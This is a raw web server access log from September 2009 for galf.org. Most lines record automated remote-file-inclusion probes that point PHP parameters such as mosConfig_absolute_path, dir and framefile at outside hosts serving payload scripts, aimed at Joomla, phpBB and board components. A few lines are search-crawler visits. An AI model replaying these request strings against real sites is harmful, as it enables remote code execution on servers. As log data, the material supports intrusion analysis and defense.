117.102.204.130 - - [21/Sep/2009:08:08:07 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.102.204.130 - - [21/Sep/2009:08:08:07 -0700] "GET /logs/access.log%20%20//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.102.204.130 - - [21/Sep/2009:08:08:07 -0700] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.80.193.42 - - [21/Sep/2009:08:09:04 -0700] "GET /labia23portugues/index.htm HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; (R1 1.5))" "www.galf.org"
65.55.209.194 - - [21/Sep/2009:08:10:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.194 - - [21/Sep/2009:08:10:15 -0700] "GET /logs/access_090413.log HTTP/1.1" 200 1179648 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:08:13:03 -0700] "GET /logs/access_090420.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:08:13:15 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
85.32.43.200 - - [21/Sep/2009:08:13:50 -0700] "GET /mainbody.php?mosConfig_absolute_path=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.32.43.200 - - [21/Sep/2009:08:13:50 -0700] "GET /logs//mainbody.php?mosConfig_absolute_path=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.32.43.200 - - [21/Sep/2009:08:18:07 -0700] "GET /logs/access_090518.log//mainbody.php?mosConfig_absolute_path=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.32.43.200 - - [21/Sep/2009:08:18:07 -0700] "GET /logs/access_090504.log//mainbody.php?mosConfig_absolute_path=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:36:36 -0700] "GET /logs/access_090525.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:36:36 -0700] "GET /logs/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:37:08 -0700] "GET /logs/access.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:37:09 -0700] "GET /logs/access.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:54 -0700] "GET /logs/access_090525.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:54 -0700] "GET /!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:54 -0700] "GET /logs/access_090525.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:55 -0700] "GET /logs/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:55 -0700] "GET /logs/access_090525.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:55 -0700] "GET /!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:56 -0700] "GET /logs/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:56 -0700] "GET /!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:56 -0700] "GET /logs/access_090525.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:56 -0700] "GET /logs/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:57 -0700] "GET /!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:37:57 -0700] "GET /logs/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:38:34 -0700] "GET /logs/access.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:38:35 -0700] "GET /logs/access.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:38:36 -0700] "GET /logs/access.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:38:36 -0700] "GET /logs/access.log/!rfihttp://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.55.139.182 - - [21/Sep/2009:08:40:50 -0700] "GET /playing.php/common/db.php?commonpath=http://www.medisite.fr/id??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
83.55.139.182 - - [21/Sep/2009:08:40:51 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.medisite.fr/id??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:42:06 -0700] "GET /logs/access_090323.log//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:42:06 -0700] "GET /frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:42:06 -0700] "GET /logs//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
87.104.34.140 - - [21/Sep/2009:08:42:09 -0700] "GET /playing.php/common/db.php?commonpath=http://www.medisite.fr/id??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
87.104.34.140 - - [21/Sep/2009:08:42:09 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.medisite.fr/id??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:42:13 -0700] "GET /logs/access_090323.log//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:42:13 -0700] "GET /frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
70.85.42.34 - - [21/Sep/2009:08:42:14 -0700] "GET /logs//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:08:42:16 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:08:42:16 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:08:42:21 -0700] "GET /logs/access_090831.log//tools/send_reminders.php?noSet=0&includedir=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:16 -0700] "GET /logs/access_090323.log//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:16 -0700] "GET /frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:17 -0700] "GET /logs//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:17 -0700] "GET /logs/access_090323.log//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:18 -0700] "GET /frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:18 -0700] "GET /logs/access_090323.log//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:18 -0700] "GET /logs//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:19 -0700] "GET /frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:19 -0700] "GET /logs/access_090323.log//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:19 -0700] "GET /frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:19 -0700] "GET /logs//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
202.44.32.9 - - [21/Sep/2009:08:43:20 -0700] "GET /logs//frame.php?framefile=http://sportsedu.net/zboard/data/writeskill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:08:45:19 -0700] "GET //skin/ggambo7002_board/setup.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:08:45:29 -0700] "GET /logs///skin/ggambo7002_board/setup.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:08:45:29 -0700] "GET /logs/access_090817.log%20%20///skin/ggambo7002_board/setup.php?dir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:08:47:47 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:08:47:47 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:08:47:47 -0700] "GET /logs/access_090615.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://crewempi.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
72.52.205.88 - - [21/Sep/2009:08:48:06 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tuwebtv.es/cache/id? HTTP/1.0" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:08:50:44 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:08:50:44 -0700] "GET /logs/access_090223.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:08:50:44 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [21/Sep/2009:08:50:58 -0700] "GET /logs/access_090622.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.52.205.88 - - [21/Sep/2009:08:52:44 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:09:00:20 -0700] "GET /?setup[use_category]=1&dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:09:00:20 -0700] "GET /logs/access_090223.log%20%20/?setup[use_category]=1&dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:09:00:20 -0700] "GET /logs/?setup[use_category]=1&dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:09:00:35 -0700] "GET /logs/access_090622.log%20%20/?setup[use_category]=1&dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.44.187.42 - - [21/Sep/2009:09:00:37 -0700] "GET /logs/access_090413.log%20//modules/My_eGallery/public/displayCategory.php?basepath=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [21/Sep/2009:09:00:37 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [21/Sep/2009:09:00:37 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.52.205.88 - - [21/Sep/2009:09:00:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
72.44.187.42 - - [21/Sep/2009:09:01:02 -0700] "GET /logs/access_090420.log%20//modules/My_eGallery/public/displayCategory.php?basepath=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [21/Sep/2009:09:04:10 -0700] "GET /logs/access_090413.log//modules/My_eGallery/public/displayCategory.php?basepath=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [21/Sep/2009:09:04:20 -0700] "GET /logs/access_090427.log//modules/My_eGallery/public/displayCategory.php?basepath=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [21/Sep/2009:09:04:34 -0700] "GET /logs/access_090518.log//modules/My_eGallery/public/displayCategory.php?basepath=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [21/Sep/2009:09:06:12 -0700] "GET /logs/access_090420.log//modules/My_eGallery/public/displayCategory.php?basepath=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.187.42 - - [21/Sep/2009:09:06:19 -0700] "GET /logs/access_090803.log//modules/My_eGallery/public/displayCategory.php?basepath=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.191.117.212 - - [21/Sep/2009:09:09:02 -0700] "GET /logs/access.log%20%20/error.php?dir=http://china-top.ru//assets/snippets/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.191.117.212 - - [21/Sep/2009:09:09:02 -0700] "GET /error.php?dir=http://china-top.ru//assets/snippets/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.191.117.212 - - [21/Sep/2009:09:09:02 -0700] "GET /logs/error.php?dir=http://china-top.ru//assets/snippets/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.228.191.194 - - [21/Sep/2009:09:09:49 -0700] "GET /logs/access.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.172.38.225 - - [21/Sep/2009:09:11:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://saddogshirts.com/t.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:18:45 -0700] "GET /logs/access.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:18:45 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:18:45 -0700] "GET /logs/access_090420.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:18:45 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.115.153 - - [21/Sep/2009:09:21:10 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
210.9.225.61 - - [21/Sep/2009:09:21:17 -0700] "GET /download.php?sayfa=http://www.hanyeong.ac.kr/images/zv/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.9.225.61 - - [21/Sep/2009:09:21:18 -0700] "GET /logs/download.php?sayfa=http://www.hanyeong.ac.kr/images/zv/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:09:27:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:09:27:37 -0700] "GET /logs/access_090831.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.8.115 - - [21/Sep/2009:09:28:34 -0700] "GET /logs/access_090518.log HTTP/1.0" 200 8460331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:30:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:30:28 -0700] "GET /logs/access_090223.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:30:28 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:30:34 -0700] "GET /logs/access_090824.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:09:32:02 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:09:32:02 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.125.237.35 - - [21/Sep/2009:09:32:02 -0700] "GET /logs/access_090831.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://ywkim.pe.kr///upload_img/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:09:39:54 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [21/Sep/2009:09:39:54 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [21/Sep/2009:09:39:54 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
89.187.131.186 - - [21/Sep/2009:09:43:53 -0700] "GET /logs/access_090713.log%20//displayCategory.php?basepath=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
89.187.131.186 - - [21/Sep/2009:09:43:53 -0700] "GET /logs//displayCategory.php?basepath=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
89.187.131.186 - - [21/Sep/2009:09:43:53 -0700] "GET /displayCategory.php?basepath=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
89.187.131.186 - - [21/Sep/2009:09:43:53 -0700] "GET /logs/access_090420.log%20//displayCategory.php?basepath=http://gh0st.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:09:45:59 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:09:46:00 -0700] "GET /logs/access_090420.log//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:09:46:01 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:09:49:05 -0700] "GET /modules/foro/includes/functions_admin.php?phpbb_root_path=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:09:49:05 -0700] "GET /logs/access_090713.log/modules/foro/includes/functions_admin.php?phpbb_root_path=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:09:49:05 -0700] "GET /logs/modules/foro/includes/functions_admin.php?phpbb_root_path=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.109.230 - - [21/Sep/2009:09:49:05 -0700] "GET /logs/access_090629.log/modules/foro/includes/functions_admin.php?phpbb_root_path=http://gh0st.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:52:42 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:09:53:28 -0700] "GET /logs/access_090223.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
